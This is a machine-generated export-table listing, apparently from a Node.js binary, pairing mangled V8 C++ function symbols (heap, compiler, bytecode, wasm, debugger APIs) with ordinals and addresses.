                                  ?GetFunctionTableEntry@WasmTableObject@internal@v8@@SAXPEAVIsolate@23@V?$Handle@VWasmTableObject@internal@v8@@@23@HPEA_N2PEAV?$MaybeHandle@VWasmInstanceObject@internal@v8@@@23@PEAHPEAV?$MaybeHandle@VWasmJSFunction@internal@v8@@@23@@Z63770x140520510
                                  ?GetHandler@Proxy@v8@@QEAA?AV?$Local@VValue@v8@@@2@XZ63780x140a853c0
                                  ?GetHandlerTableOffset@CodeGenerator@compiler@internal@v8@@QEBA_KXZ63790x140495720
                                  ?GetHasInstance@Symbol@v8@@SA?AV?$Local@VSymbol@v8@@@2@PEAVIsolate@2@@Z63800x140a88e20
                                  ?GetHash@OrderedHashMap@internal@v8@@SA_KPEAVIsolate@23@_K@Z63810x14075f820
                                  ?GetHashCore@StringHasher@internal@v8@@SAII@Z63820x140423150
                                  ?GetHeapCodeAndMetadataStatistics@Isolate@v8@@QEAA_NPEAVHeapCodeStatistics@2@@Z63830x140a88e30
                                  ?GetHeapObjectStatisticsAtLastGC@Isolate@v8@@QEAA_NPEAVHeapObjectStatistics@2@_K@Z63840x140a88e90
                                  ?GetHeapProfiler@Isolate@v8@@QEAAPEAVHeapProfiler@2@XZ63850x14042b470
                                  ?GetHeapSnapshot@HeapProfiler@v8@@QEAAPEBVHeapSnapshot@2@H@Z63860x140a88f40
                                  ?GetHeapSpaceStatistics@Isolate@v8@@QEAA_NPEAVHeapSpaceStatistics@2@_K@Z63870x140a88f50
                                  ?GetHeapStatistics@Isolate@v8@@QEAAXPEAVHeapStatistics@2@@Z63880x140a88ff0
                                  ?GetHeapStats@HeapProfiler@v8@@QEAAIPEAVOutputStream@2@PEA_J@Z63890x140a89130
                                  ?GetHitBreakPoints@Debug@internal@v8@@QEAA?AV?$MaybeHandle@VFixedArray@internal@v8@@@23@V?$Handle@VDebugInfo@internal@v8@@@23@H@Z63900x1409c06e0
                                  ?GetHitCount@CpuProfileNode@v8@@QEBAIXZ63910x14027f600
                                  ?GetHitLineCount@CpuProfileNode@v8@@QEBAIXZ63920x1403176b0
                                  ?GetHitLineCount@ProfileNode@internal@v8@@QEBAIXZ63930x1403176b0
                                  ?GetHostDefinedOptions@ScriptOrModule@v8@@QEAA?AV?$Local@VPrimitiveArray@v8@@@2@XZ63940x140a89140
                                  ?GetI32WasmCallDescriptor@compiler@internal@v8@@YAPEAVCallDescriptor@123@PEAVZone@23@PEBV4123@@Z63950x140e5db50
                                  ?GetI32WasmCallDescriptorForSimd@compiler@internal@v8@@YAPEAVCallDescriptor@123@PEAVZone@23@PEAV4123@@Z63960x140e5db80
                                  ?GetId@HeapGraphNode@v8@@QEBAIXZ63970x140076c40
                                  ?GetId@UnboundScript@v8@@QEAAHXZ63980x140a891e0
                                  ?GetIdAt@SourceIdAssigner@compiler@internal@v8@@QEBAH_K@Z63990x140e5dbb0
                                  ?GetIdFor@SourceIdAssigner@compiler@internal@v8@@QEAAHV?$Handle@VSharedFunctionInfo@internal@v8@@@34@@Z64000x140ecd7a0
                                  ?GetIdentifier@Parser@internal@v8@@AEBAPEBVAstRawString@23@XZ64010x1406fae80
                                  ?GetIdentifierString@AsmJsScanner@internal@v8@@QEBAAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ64020x1401665a0
                                  ?GetIdentityHash@JSReceiver@internal@v8@@QEAA?AVObject@23@XZ64030x1407b81b0
                                  ?GetIdentityHash@Module@v8@@QEBAHXZ64040x14041c440
                                  ?GetIdentityHash@Name@v8@@QEAAHXZ64050x140a89340
                                  ?GetIdentityHash@Object@v8@@QEAAHXZ64060x140a89370
                                  ?GetImmediate@InstructionSequence@compiler@internal@v8@@QEBA?AVConstant@234@PEBVImmediateOperand@234@@Z64070x140453a00
                                  ?GetImmediateOperand@BytecodeArrayAccessor@interpreter@internal@v8@@QEBAHH@Z64080x14089ab60
                                  ?GetImportMeta@SourceTextModule@internal@v8@@SA?AV?$Handle@VJSObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VSourceTextModule@internal@v8@@@23@@Z64090x140752d40
                                  ?GetInLiveness@BytecodeLivenessMap@compiler@internal@v8@@QEAAPEAVBytecodeLivenessState@234@H@Z64100x140ddf1c0
                                  ?GetInLiveness@BytecodeLivenessMap@compiler@internal@v8@@QEBAPEBVBytecodeLivenessState@234@H@Z64110x140ddf1c0
                                  ?GetInLivenessFor@BytecodeAnalysis@compiler@internal@v8@@QEBAPEBVBytecodeLivenessState@234@H@Z64120x140ea0430
                                  ?GetInObjectProperties@MapRef@compiler@internal@v8@@QEBAHXZ64130x140ddf1e0
                                  ?GetInObjectPropertiesStartInWords@MapRef@compiler@internal@v8@@QEBAHXZ64140x140ddf280
                                  ?GetInObjectPropertyOffset@MapRef@compiler@internal@v8@@QEBAHH@Z64150x140ddf320
                                  ?GetIncomingDescriptor@Linkage@compiler@internal@v8@@QEBAPEAVCallDescriptor@234@XZ64160x1400769d0
                                  ?GetIncumbentContext@Isolate@internal@v8@@QEAA?AV?$Handle@VContext@internal@v8@@@23@XZ64170x14097e2b0
                                  ?GetIncumbentContext@Isolate@v8@@QEAA?AV?$Local@VContext@v8@@@2@XZ64180x140a89400
                                  ?GetIndexNodes@Int64Lowering@compiler@internal@v8@@AEAAXPEAVNode@234@PEAPEAV5234@1@Z64190x140ed2f00
                                  ?GetIndexOperand@BytecodeArrayAccessor@interpreter@internal@v8@@QEBAIH@Z64200x14089ab70
                                  ?GetIndexes@LayoutDescriptor@internal@v8@@AEAA_NHPEAH0@Z64210x140423180
                                  ?GetInferredName@Function@v8@@QEBA?AV?$Local@VValue@v8@@@2@XZ64220x140a89430
                                  ?GetInlineability@SharedFunctionInfoRef@compiler@internal@v8@@QEBA?AW4Inlineability@SharedFunctionInfo@34@XZ64230x140ddf490
                                  ?GetInliningId@SourcePositionTable@internal@v8@@QEBAHH@Z64240x1406d5fb0
                                  ?GetInputLocation@CallDescriptor@compiler@internal@v8@@QEBA?AVLinkageLocation@234@_K@Z64250x14045afe0
                                  ?GetInputPtr@Node@compiler@internal@v8@@AEAAPEAPEAV1234@H@Z64260x14045b010
                                  ?GetInputPtrConst@Node@compiler@internal@v8@@AEBAPEBQEAV1234@H@Z64270x14045b010
                                  ?GetInputRegister@BytecodeRegisterOptimizer@interpreter@internal@v8@@QEAA?AVRegister@234@V5234@@Z64280x1408710d0
                                  ?GetInputRegisterList@BytecodeRegisterOptimizer@interpreter@internal@v8@@QEAA?AVRegisterList@234@V5234@@Z64290x140871160
                                  ?GetInputRegisterListOperand@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAIVRegisterList@234@@Z64300x1408944b0
                                  ?GetInputRegisterOperand@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAIVRegister@234@@Z64310x1408944f0
                                  ?GetInputType@CallDescriptor@compiler@internal@v8@@QEBA?AVMachineType@34@_K@Z64320x14045b040
                                  ?GetInspectorParentHandle@node@@YA?AV?$unique_ptr@UInspectorParentHandle@node@@U?$default_delete@UInspectorParentHandle@node@@@std@@@std@@PEAVEnvironment@1@UThreadId@1@PEBD@Z64330x140249600
                                  ?GetInstructionBlock@InstructionSequence@compiler@internal@v8@@QEBAPEAVInstructionBlock@234@H@Z64340x140e04950
                                  ?GetInstructionFlags@InstructionScheduler@compiler@internal@v8@@AEBAHPEBVInstruction@234@@Z64350x140ea5080
                                  ?GetInterceptor@LookupIterator@internal@v8@@QEBA?AV?$Handle@VInterceptorInfo@internal@v8@@@23@XZ64360x140423210
                                  ?GetInterceptorForFailedAccessCheck@LookupIterator@internal@v8@@QEBA?AV?$Handle@VInterceptorInfo@internal@v8@@@23@XZ64370x14079cae0
                                  ?GetInternalField@Object@v8@@QEAA?AV?$Local@VValue@v8@@@2@H@Z64380x140076fb0
                                  ?GetInternalPointer@StatsCounterThreadSafe@internal@v8@@QEAAPEAHXZ64390x140076c20
                                  ?GetIntrinsicIdOperand@BytecodeArrayAccessor@interpreter@internal@v8@@QEBA?AW4FunctionId@Runtime@34@H@Z64400x14089abc0
                                  ?GetIsConcatSpreadable@Symbol@v8@@SA?AV?$Local@VSymbol@v8@@@2@PEAVIsolate@2@@Z64410x140a895f0
                                  ?GetIsolate@Context@v8@@QEAAPEAVIsolate@2@XZ64420x140816460
                                  ?GetIsolate@FeedbackNexus@internal@v8@@QEBAPEAVIsolate@23@XZ64430x140423390
                                  ?GetIsolate@HandleScope@v8@@QEBAPEAVIsolate@2@XZ64440x1400769d0
                                  ?GetIsolate@Message@v8@@QEBAPEAVIsolate@2@XZ64450x140816460
                                  ?GetIsolate@Object@v8@@QEAAPEAVIsolate@2@XZ64460x140816460
                                  ?GetIsolate@Script@debug@v8@@QEBAPEAVIsolate@3@XZ64470x140816460
                                  ?GetIsolate@SnapshotCreator@v8@@QEAAPEAVIsolate@2@XZ64480x14037ad30
                                  ?GetIterator@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@HH@Z64490x140894520
                                  ?GetIterator@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@0@Z64500x140eadf60
                                  ?GetIterator@Symbol@v8@@SA?AV?$Local@VSymbol@v8@@@2@PEAVIsolate@2@@Z64510x140a89600
                                  ?GetJSCallArgCountParamIndex@Linkage@compiler@internal@v8@@SAHH@Z64520x14045b080
                                  ?GetJSCallContextParamIndex@Linkage@compiler@internal@v8@@SAHH@Z64530x14045b090
                                  ?GetJSCallDescriptor@Linkage@compiler@internal@v8@@SAPEAVCallDescriptor@234@PEAVZone@34@_NHV?$Flags@W4Flag@CallDescriptor@compiler@internal@v8@@H@base@4@@Z64540x140e67a40
                                  ?GetJSCallNewTargetParamIndex@Linkage@compiler@internal@v8@@SAHH@Z64550x1402a33a0
                                  ?GetJSContextParameter@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VContext@internal@v8@@@34@XZ64560x140e6e6d0
                                  ?GetJSCreateMap@NodeProperties@compiler@internal@v8@@SA?AV?$Optional@VMapRef@compiler@internal@v8@@@base@4@PEAVJSHeapBroker@234@PEAVNode@234@@Z64570x140e44390
                                  ?GetJSEntryStubs@Isolate@v8@@QEAA?AUJSEntryStubs@2@XZ64580x140a89610
                                  ?GetJobFor@CompilerDispatcher@internal@v8@@AEBA?AV?$_Tree_const_iterator@V?$_Tree_val@U?$_Tree_simple_types@U?$pair@$$CB_KV?$unique_ptr@UJob@CompilerDispatcher@internal@v8@@U?$default_delete@UJob@CompilerDispatcher@internal@v8@@@std@@@std@@@std@@@std@@@std@@@std@@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@@Z64590x1409d65a0
                                  ?GetJumpTableOffset@NativeModule@wasm@internal@v8@@QEBAII@Z64600x1405713b0
                                  ?GetJumpTableTargetOffsets@BytecodeArrayAccessor@interpreter@internal@v8@@QEBA?AVJumpTableTargetOffsets@234@XZ64610x14089ac10
                                  ?GetJumpTargetOffset@BytecodeArrayAccessor@interpreter@internal@v8@@QEBAHXZ64620x14089ad00
                                  ?GetJumpWithoutToBoolean@Bytecodes@interpreter@internal@v8@@SA?AW4Bytecode@234@W45234@@Z64630x14086f430
                                  ?GetKey@CallDescriptors@internal@v8@@SA?AW4Key@123@PEBVCallInterfaceDescriptorData@23@@Z64640x14045b0a0
                                  ?GetKey@Descriptor@internal@v8@@QEBA?AV?$Handle@VName@internal@v8@@@23@XZ64650x140078350
                                  ?GetKey@TransitionsAccessor@internal@v8@@QEAA?AVName@23@H@Z64660x1404233d0
                                  ?GetKeyType@FeedbackNexus@internal@v8@@QEBA?AW4IcCheckType@23@XZ64670x1407f7f20
                                  ?GetKeyedAccessLoadMode@FeedbackNexus@internal@v8@@QEBA?AW4KeyedAccessLoadMode@23@XZ64680x1407f8000
                                  ?GetKeyedAccessStoreMode@FeedbackNexus@internal@v8@@QEBA?AW4KeyedAccessStoreMode@23@XZ64690x1407f8140
                                  ?GetKeyedStoreICSlotKind@FeedbackVectorSpec@internal@v8@@QEAA?AW4FeedbackSlotKind@23@W4LanguageMode@23@@Z64700x140423450
                                  ?GetKind@FeedbackMetadata@internal@v8@@QEBA?AW4FeedbackSlotKind@23@VFeedbackSlot@23@@Z64710x1407f84c0
                                  ?GetKind@FeedbackVector@internal@v8@@QEBA?AW4FeedbackSlotKind@23@VFeedbackSlot@23@@Z64720x1407f8500
                                  ?GetKind@FeedbackVectorSpec@internal@v8@@QEBA?AW4FeedbackSlotKind@23@VFeedbackSlot@23@@Z64730x140423460
                                  ?GetLabel@CodeGenerator@compiler@internal@v8@@QEAAPEAVLabel@34@VRpoNumber@234@@Z64740x140495730
                                  ?GetLanguageMode@FeedbackNexus@internal@v8@@QEBA?AW4LanguageMode@23@XZ64750x140423490
                                  ?GetLastError@OS@base@v8@@SAHXZ64760x140dc0940
                                  ?GetLastFunctionLiteralId@?$ParserBase@VParser@internal@v8@@@internal@v8@@QEBAHXZ64770x1406fae90
                                  ?GetLineNumber@CpuProfileNode@v8@@QEBAHXZ64780x1406ccdd0
                                  ?GetLineNumber@JSMessageObject@internal@v8@@QEBAHXZ64790x1407b8380
                                  ?GetLineNumber@Location@debug@v8@@QEBAHXZ64800x140076a00
                                  ?GetLineNumber@Location@v8@@QEAAHXZ64810x140076a00
                                  ?GetLineNumber@Message@v8@@QEBA?AV?$Maybe@H@2@V?$Local@VContext@v8@@@2@@Z64820x140a89720
                                  ?GetLineNumber@Script@internal@v8@@SAHV?$Handle@VScript@internal@v8@@@23@H@Z64830x140777320
                                  ?GetLineNumber@StackFrame@v8@@QEBAHXZ64840x140a898a0
                                  ?GetLineNumber@UnboundScript@v8@@QEAAHH@Z64850x140a898b0
                                  ?GetLineTicks@CpuProfileNode@v8@@QEBA_NPEAULineTick@12@I@Z64860x140a89a10
                                  ?GetLineTicks@ProfileNode@internal@v8@@QEBA_NPEAULineTick@CpuProfileNode@3@I@Z64870x1406d6030
                                  ?GetListOfBlocksRequiringSpillOperands@TopLevelLiveRange@compiler@internal@v8@@QEBAPEAVBitVector@34@PEBVRegisterAllocationData@234@@Z64880x14029f0f0
                                  ?GetLiveness@BytecodeLivenessMap@compiler@internal@v8@@QEAAAEAUBytecodeLiveness@234@H@Z64890x140e9f270
                                  ?GetLiveness@BytecodeLivenessMap@compiler@internal@v8@@QEBAAEBUBytecodeLiveness@234@H@Z64900x140e9f270
                                  ?GetLoadedScripts@Debug@internal@v8@@QEAA?AV?$Handle@VFixedArray@internal@v8@@@23@XZ64910x1409c0a40
                                  ?GetLoadedScripts@debug@v8@@YAXPEAVIsolate@2@AEAV?$PersistentValueVector@VScript@debug@v8@@VDefaultPersistentValueVectorTraits@3@@2@@Z64920x140a89a20
                                  ?GetLocalCount@InterpretedFrame@wasm@internal@v8@@QEBAHXZ64930x1405571d0
                                  ?GetLocalName@DebugInfo@wasm@internal@v8@@QEAA?AVWireBytesRef@234@HH@Z64940x140566ca0
                                  ?GetLocalOffsetFromOS@DateCache@internal@v8@@UEAAH_J_N@Z64950x1409d3910
                                  ?GetLocalScopeObject@DebugInfo@wasm@internal@v8@@QEAA?AV?$Handle@VJSObject@internal@v8@@@34@PEAVIsolate@34@_K11@Z64960x140566ed0
                                  ?GetLocalValue@DebugInfo@wasm@internal@v8@@QEAA?AVWasmValue@234@HPEAVIsolate@34@_K11@Z64970x1405672a0
                                  ?GetLocalValue@InterpretedFrame@wasm@internal@v8@@QEBA?AVWasmValue@234@H@Z64980x140557200
                                  ?GetLoopInfoFor@BytecodeAnalysis@compiler@internal@v8@@QEBAAEBULoopInfo@234@H@Z64990x140ea0460
                                  ?GetLoopOffsetFor@BytecodeAnalysis@compiler@internal@v8@@QEBAHH@Z65000x140ea04a0
                                  ?GetMachineSignature@CallDescriptor@compiler@internal@v8@@QEBAPEAV?$Signature@VMachineType@internal@v8@@@34@PEAVZone@34@@Z65010x140e67c40
                                  ?GetMainThreadMultiIsolatePlatform@node@@YAPEAVMultiIsolatePlatform@1@XZ65020x140249640
                                  ?GetMajor@Version@internal@v8@@SAHXZ65030x14051a6b0
                                  ?GetMap@?$BaseShape@PEAVHashTableKey@internal@v8@@@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@VReadOnlyRoots@23@@Z65040x1407773a0
                                  ?GetMap@?$BaseShape@V?$Handle@VObject@internal@v8@@@internal@v8@@@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@VReadOnlyRoots@23@@Z65050x1407773a0
                                  ?GetMap@?$BaseShape@VString@internal@v8@@@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@VReadOnlyRoots@23@@Z65060x1407773a0
                                  ?GetMap@GlobalDictionaryShape@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@VReadOnlyRoots@23@@Z65070x1404234d0
                                  ?GetMap@OrderedHashMap@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@VReadOnlyRoots@23@@Z65080x14041c290
                                  ?GetMap@OrderedHashSet@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@VReadOnlyRoots@23@@Z65090x14041c2a0
                                  ?GetMap@StringTableShape@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@VReadOnlyRoots@23@@Z65100x1404234e0
                                  ?GetMatch@Symbol@v8@@SA?AV?$Local@VSymbol@v8@@@2@PEAVIsolate@2@@Z65110x140a89bd0
                                  ?GetMaterializedEquivalent@BytecodeRegisterOptimizer@interpreter@internal@v8@@AEAAPEAVRegisterInfo@1234@PEAV51234@@Z65120x140871270
                                  ?GetMaterializedEquivalentNotAccumulator@BytecodeRegisterOptimizer@interpreter@internal@v8@@AEAAPEAVRegisterInfo@1234@PEAV51234@@Z65130x1408712a0
                                  ?GetMaxAllocatedBytes@StatsScope@ZoneStats@compiler@internal@v8@@QEAA_KXZ65140x140fb2930
                                  ?GetMaxAllocatedBytes@ZoneStats@compiler@internal@v8@@QEBA_KXZ65150x140fb2960
                                  ?GetMaxChildCount@TopLevelLiveRange@compiler@internal@v8@@QEBAHXZ65160x140e83cb0
                                  ?GetMaxMemoryUsage@AccountingAllocator@internal@v8@@QEBA_KXZ65170x140076c20
                                  ?GetMaxSnapshotJSObjectId@HeapSnapshot@v8@@QEBAIXZ65180x140a89be0
                                  ?GetMaxStringLength@JSNativeContextSpecialization@compiler@internal@v8@@SA?AV?$Optional@_K@base@4@PEAVJSHeapBroker@234@PEAVNode@234@@Z65190x140f80240
                                  ?GetMaximumFillToAlign@Heap@internal@v8@@SAHW4AllocationAlignment@23@@Z65200x140930400
                                  ?GetMicrotasksPolicy@Isolate@v8@@QEBA?AW4MicrotasksPolicy@2@XZ65210x140a89cc0
                                  ?GetMicrotasksScopeDepth@MicrotaskQueue@internal@v8@@UEBAHXZ65220x1401aa010
                                  ?GetMigrationTarget@TransitionsAccessor@internal@v8@@QEAA?AVMap@23@XZ65230x140743560
                                  ?GetMinor@Version@internal@v8@@SAHXZ65240x14051a6c0
                                  ?GetMode@RelocIterator@internal@v8@@AEAA?AW4Mode@RelocInfo@23@XZ65250x1409da8b0
                                  ?GetModuleNamespace@Module@v8@@QEAA?AV?$Local@VValue@v8@@@2@XZ65260x140a89cd0
                                  ?GetModuleRequest@Module@v8@@QEBA?AV?$Local@VString@v8@@@2@H@Z65270x140a89d90
                                  ?GetModuleRequestLocation@Module@v8@@QEBA?AVLocation@2@H@Z65280x140a89f50
                                  ?GetModuleRequestsLength@Module@v8@@QEBAHXZ65290x140a8a1a0
                                  ?GetMultiIsolatePlatform@node@@YAPEAVMultiIsolatePlatform@1@PEAVEnvironment@1@@Z65300x140249650
                                  ?GetMultiIsolatePlatform@node@@YAPEAVMultiIsolatePlatform@1@PEAVIsolateData@1@@Z65310x140249660
                                  ?GetName@CpuProfilesCollection@internal@v8@@QEAAPEBDVName@23@@Z65320x1406cca10
                                  ?GetName@FeedbackNexus@internal@v8@@QEBA?AVName@23@XZ65330x1407f8540
                                  ?GetName@Function@v8@@QEBA?AV?$Local@VValue@v8@@@2@XZ65340x140a8a250
                                  ?GetName@HeapGraphEdge@v8@@QEBA?AV?$Local@VValue@v8@@@2@XZ65350x140a8a3e0
                                  ?GetName@HeapGraphNode@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ65360x140a8a4f0
                                  ?GetName@LookupIterator@internal@v8@@QEAA?AV?$Handle@VName@internal@v8@@@23@XZ65370x1404234f0
                                  ?GetName@ProfilerListener@internal@v8@@QEAAPEBDH@Z65380x1406cca20
                                  ?GetName@ProfilerListener@internal@v8@@QEAAPEBDPEBD@Z65390x1406cca30
                                  ?GetName@ProfilerListener@internal@v8@@QEAAPEBDV?$Vector@$$CBD@23@@Z65400x1406d2970
                                  ?GetName@ProfilerListener@internal@v8@@QEAAPEBDVName@23@@Z65410x1406cca40
                                  ?GetName@StringsStorage@internal@v8@@QEAAPEBDH@Z65420x1406cd920
                                  ?GetName@StringsStorage@internal@v8@@QEAAPEBDVName@23@@Z65430x1406cd930
                                  ?GetNameFeedback@JSHeapBroker@compiler@internal@v8@@QEAA?AV?$Optional@VNameRef@compiler@internal@v8@@@base@4@AEBVFeedbackNexus@34@@Z65440x140ddf560
                                  ?GetNameOrNull@ModuleWireBytes@wasm@internal@v8@@QEBA?AV?$Vector@$$CBD@34@PEBUWasmFunction@234@PEBUWasmModule@234@@Z65450x140528e50
                                  ?GetNameOrNull@ModuleWireBytes@wasm@internal@v8@@QEBA?AV?$Vector@$$CBD@34@VWireBytesRef@234@@Z65460x140528ee0
                                  ?GetNativeContextIndexOperand@BytecodeArrayAccessor@interpreter@internal@v8@@QEBAIH@Z65470x14089ab70
                                  ?GetNativeFunctionTemplate@Extension@v8@@UEAA?AV?$Local@VFunctionTemplate@v8@@@2@PEAVIsolate@2@V?$Local@VString@v8@@@2@@Z65480x140076d00
                                  ?GetNearCallTargetForFunction@NativeModule@wasm@internal@v8@@QEBA_KIAEBUJumpTablesRef@1234@@Z65490x1405713e0
                                  ?GetNearRuntimeStubEntry@NativeModule@wasm@internal@v8@@QEBA_KW4RuntimeStubId@WasmCode@234@AEBUJumpTablesRef@1234@@Z65500x140571410
                                  ?GetNextByte@EhFrameIterator@internal@v8@@QEAAEXZ65510x140448430
                                  ?GetNextChildId@TopLevelLiveRange@compiler@internal@v8@@QEAAHXZ65520x140e83cc0
                                  ?GetNextFunctionLiteralId@?$ParserBase@VParser@internal@v8@@@internal@v8@@QEAAHXZ65530x1406faea0
                                  ?GetNextInlineAllocationStepSize@Space@internal@v8@@IEAA_JXZ65540x1408d3250
                                  ?GetNextOpcode@EhFrameIterator@internal@v8@@QEAA?AW4DwarfOpcodes@EhFrameConstants@23@XZ65550x140448430
                                  ?GetNextSLeb128@EhFrameIterator@internal@v8@@QEAAHXZ65560x1409a5e00
                                  ?GetNextScriptId@Isolate@internal@v8@@QEAAHXZ65570x14097e3c0
                                  ?GetNextScriptId@OffThreadIsolate@internal@v8@@QEAAHXZ65580x14096f090
                                  ?GetNextSymbol@Parser@internal@v8@@AEBAPEBVAstRawString@23@XZ65590x1406faeb0
                                  ?GetNextUInt16@EhFrameIterator@internal@v8@@QEAAGXZ65600x140448440
                                  ?GetNextUInt32@EhFrameIterator@internal@v8@@QEAAIXZ65610x140448450
                                  ?GetNextULeb128@EhFrameIterator@internal@v8@@QEAAIXZ65620x1409a5e50
                                  ?GetNode@HeapSnapshot@v8@@QEBAPEBVHeapGraphNode@2@H@Z65630x140a8a580
                                  ?GetNodeById@HeapSnapshot@v8@@QEBAPEBVHeapGraphNode@2@I@Z65640x140a8a5d0
                                  ?GetNodeForValues@StateValuesCache@compiler@internal@v8@@QEAAPEAVNode@234@PEAPEAV5234@_KPEBVBitVector@34@H@Z65650x140ea8380
                                  ?GetNodeId@CpuProfileNode@v8@@QEBAIXZ65660x1406ccdb0
                                  ?GetNodeOrigin@NodeOriginTable@compiler@internal@v8@@QEBA?AVNodeOrigin@234@PEAVNode@234@@Z65670x140ed6bb0
                                  ?GetNodesCount@HeapSnapshot@v8@@QEBAHXZ65680x140a8a5e0
                                  ?GetNonEvalDeclarationScope@Scope@internal@v8@@QEAAPEAVDeclarationScope@23@XZ65690x140a555f0
                                  ?GetNumLocals@DebugInfo@wasm@internal@v8@@QEAAHPEAVIsolate@34@_K@Z65700x1405675d0
                                  ?GetNumberAsSymbol@Parser@internal@v8@@AEBAPEBVAstRawString@23@XZ65710x1406faec0
                                  ?GetNumberOfCodeSpacesForTesting@NativeModule@wasm@internal@v8@@QEBA_KXZ65720x140571420
                                  ?GetNumberOfDataSlots@Isolate@v8@@SAIXZ65730x140077230
                                  ?GetNumberOfEmbedderDataFields@Context@v8@@QEAAIXZ65740x140a8a5f0
                                  ?GetNumberOfRegistersRepresentedBy@Bytecodes@interpreter@internal@v8@@SAHW4OperandType@234@@Z65750x140423550
                                  ?GetNumberOption@Intl@internal@v8@@SA?AV?$Maybe@H@3@PEAVIsolate@23@V?$Handle@VJSReceiver@internal@v8@@@23@V?$Handle@VString@internal@v8@@@23@HHH@Z65760x1407edec0
                                  ?GetObjectId@HeapProfiler@v8@@QEAAIPEAX@Z65770x140a8a630
                                  ?GetObjectId@HeapProfiler@v8@@QEAAIV?$Local@VValue@v8@@@2@@Z65780x140a8a640
                                  ?GetObjectIterator@LargeObjectSpace@internal@v8@@UEAA?AV?$unique_ptr@VObjectIterator@internal@v8@@U?$default_delete@VObjectIterator@internal@v8@@@std@@@std@@PEAVHeap@23@@Z65790x14091e080
                                  ?GetObjectIterator@NewSpace@internal@v8@@UEAA?AV?$unique_ptr@VObjectIterator@internal@v8@@U?$default_delete@VObjectIterator@internal@v8@@@std@@@std@@PEAVHeap@23@@Z65800x1408d3290
                                  ?GetObjectIterator@PagedSpace@internal@v8@@UEAA?AV?$unique_ptr@VObjectIterator@internal@v8@@U?$default_delete@VObjectIterator@internal@v8@@@std@@@std@@PEAVHeap@23@@Z65810x1408d3300
                                  ?GetObjectProperty@Runtime@internal@v8@@SA?AV?$MaybeHandle@VObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@1PEA_N@Z65820x14065ecd0
                                  ?GetOneByteStringInternal@AstValueFactory@internal@v8@@AEAAPEAVAstRawString@23@V?$Vector@$$CBE@23@@Z65830x140a61b00
                                  ?GetOperandOffset@Bytecodes@interpreter@internal@v8@@SAHW4Bytecode@234@HW4OperandScale@234@@Z65840x14086f480
                                  ?GetOperandSize@Bytecodes@interpreter@internal@v8@@SA?AW4OperandSize@234@W4Bytecode@234@HW4OperandScale@234@@Z65850x1404235d0
                                  ?GetOperandSizes@Bytecodes@interpreter@internal@v8@@SAPEBW4OperandSize@234@W4Bytecode@234@W4OperandScale@234@@Z65860x140423630
                                  ?GetOperandType@Bytecodes@interpreter@internal@v8@@SA?AW4OperandType@234@W4Bytecode@234@H@Z65870x140423650
                                  ?GetOperandTypes@Bytecodes@interpreter@internal@v8@@SAPEBW4OperandType@234@W4Bytecode@234@@Z65880x140423670
                                  ?GetOptimizedCode@OSROptimizedCodeCache@internal@v8@@QEAA?AVCode@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@VBailoutId@23@PEAVIsolate@23@@Z65890x14075bdd0
                                  ?GetOptimizedCodeForOSR@Compiler@internal@v8@@SA?AV?$MaybeHandle@VCode@internal@v8@@@23@V?$Handle@VJSFunction@internal@v8@@@23@VBailoutId@23@PEAVJavaScriptFrame@23@@Z65900x1409f26d0
                                  ?GetOrCreateAstValueFactory@ParseInfo@internal@v8@@QEAAPEAVAstValueFactory@23@XZ65910x14073a0c0
                                  ?GetOrCreateData@JSHeapBroker@compiler@internal@v8@@QEAAPEAVObjectData@234@V?$Handle@VObject@internal@v8@@@34@@Z65920x140ddf810
                                  ?GetOrCreateData@JSHeapBroker@compiler@internal@v8@@QEAAPEAVObjectData@234@VObject@34@@Z65930x140de09d0
                                  ?GetOrCreateDebugInfo@Debug@internal@v8@@QEAA?AV?$Handle@VDebugInfo@internal@v8@@@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@@Z65940x1409c0c40
                                  ?GetOrCreateDebugInfo@WasmInstanceObject@internal@v8@@SA?AV?$Handle@VWasmDebugInfo@internal@v8@@@23@V?$Handle@VWasmInstanceObject@internal@v8@@@23@@Z65950x140520f40
                                  ?GetOrCreateHash@Object@internal@v8@@QEAA?AVSmi@23@PEAVIsolate@23@@Z65960x140777520
                                  ?GetOrCreateIdentityHash@JSReceiver@internal@v8@@QEAA?AVSmi@23@PEAVIsolate@23@@Z65970x1407b88a0
                                  ?GetOrCreateParallelMove@Instruction@compiler@internal@v8@@QEAAPEAVParallelMove@234@W4GapPosition@1234@PEAVZone@34@@Z65980x140453a70
                                  ?GetOrCreateRegisterInfo@BytecodeRegisterOptimizer@interpreter@internal@v8@@AEAAPEAVRegisterInfo@1234@VRegister@234@@Z65990x140871300
                                  ?GetOrCreateScript@WasmEngine@wasm@internal@v8@@QEAA?AV?$Handle@VScript@internal@v8@@@34@PEAVIsolate@34@AEBV?$shared_ptr@VNativeModule@wasm@internal@v8@@@std@@V?$Vector@$$CBD@34@@Z66000x14055f510
                                  ?GetOrCreateTurboStatistics@WasmEngine@wasm@internal@v8@@QEAAPEAVCompilationStatistics@34@XZ66010x14055f880
                                  ?GetOrCreateWasmExternalFunction@WasmInstanceObject@internal@v8@@SA?AV?$Handle@VWasmExternalFunction@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VWasmInstanceObject@internal@v8@@@23@H@Z66020x140520fe0
                                  ?GetOsrValueLocation@Linkage@compiler@internal@v8@@QEBA?AVLinkageLocation@234@H@Z66030x140e67d70
                                  ?GetOutLiveness@BytecodeLivenessMap@compiler@internal@v8@@QEAAPEAVBytecodeLivenessState@234@H@Z66040x140de0a40
